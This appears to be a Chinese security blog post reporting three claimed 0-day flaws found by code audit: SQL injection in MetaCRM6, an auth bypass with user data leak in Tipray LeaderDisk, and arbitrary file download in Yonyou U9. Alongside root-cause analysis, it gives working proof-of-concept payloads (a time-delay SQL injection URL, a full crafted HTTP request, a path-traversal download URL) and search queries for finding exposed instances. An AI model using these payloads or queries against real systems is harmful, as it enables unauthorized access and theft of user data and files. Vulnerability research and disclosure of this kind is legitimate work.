文章总结: 这篇文章介绍了作者在代码审计过程中发现的三个0day漏洞,分别是MetaCRM6系统的SQL注入漏洞、天锐绿盘平台的信息泄露漏洞和用友U9平台的任意文件下载漏洞。作者详细分析了每个漏洞的成因、位置和利用方式,并提供了相应的POC代码。文章最后提到后续将发布微软零日漏洞的利用过程。这些发现对相关系统的安全防护具有重要参考价值。
综合评分: 86
文章分类: 代码审计,漏洞分析,漏洞POC,WEB安全,漏洞预警
记代码审计出的几个新0day
原创
安静
安静安全
2025年12月12日 13:22
广东
点击上方蓝色字体关注我们
审计过程
MetaCRM6客户关系管理系统存在SQL注入漏洞
title=”MetaCRM6客户关系管理系统”
漏洞位置位于webapps\common\jsp\sql.jsp文件,在第三行用户输入可控,接收参数为sql,之后第5行直接进入dbm.update(sql)完成SQL语句操作,从而形成SQL注入漏洞。
漏洞路径:
http://IP:PORT/common/jsp/sql.jsp?sql=→GET参数sql未过滤→触发SQL注入
POC:
http://IP:PORT/common/jsp/sql.jsp?sql=;WAITFOR DELAY ‘0:0:5’-
天锐绿盘文档安全管理平台存在信息泄露漏洞
body=”/lddsm/” || title=”天锐绿盘” || title==”Tipray LeaderDisk”
先贴出POC:
POST /lddsm/service/../admin/user/userExitList.do?userNames=管理员用户名(默认为sysadmin) HTTP/1.1Host: IP:PORTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 69Connection: closePriority: u=0
_search=false&nd=1763012062514&rows=100&page=1&sidx=usr_name&sord=asc
鉴权绕过分析:
鉴权绕过位于D:\Java-IDEA\lddsm\WEB-INF\classes\com\lddsm\filter\SessionFilter.class文件下
isNoNeedValidateid方法定义了无需鉴权的路径:
“/frontend/Download”, “/admin/captcha/”, “/main/auth.do”, “/services/”等等,这些都为白名单路径,将String[] var4 = paths赋值var4,通过for循环+if语句遍历判断,如果存在这些白名单路径则返回true,因此可以通过../../的方式进行绕过(/lddsm/service/../后台功能路径)。
信息泄露位于
D:\Java-IDEA\lddsm\frontend\importOkByExitList.jsp文件下
接口/admin/user/userExitList.do,接收参数为userNames
确定为存在的用户名则onSelectAll返回该用户的所有信息。
用友U9多组织企业互联网应用平台存在任意文件下载漏洞
body=”logo-u9.png”
漏洞位置位于
\Portal\Print\PDFDirectPrint.aspx
dll文件:
“UFSoft.UBF.ExportService.DynamaticExport.PDFDirectPrint
将该dll文件放入ILSpy进行反编译
在PDFDirectPrint中,GET参数有filePath,fileMappingName,isDeleteOrgFile,isAttachmentFlag
实际内部调用过程为Print/DynamaticExport.aspx?FilePath=
所以回到DynamaticExport中分析
可以看到在DownLoadFileToStream方法下没有任何过滤形成文件下载漏洞
POC:
http://IP:PORT/Print/PDFDirectPrint.aspx?FilePath=../../../../../../../../Windows/System32/drivers/etc/hosts
以上漏洞均已提交平台
END
后续
后续微软零日漏洞处置完将发布利用过程
END
wx:Staying_With_Me
点个在看你最好看
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:安静安全 安静《记代码审计出的几个新0day》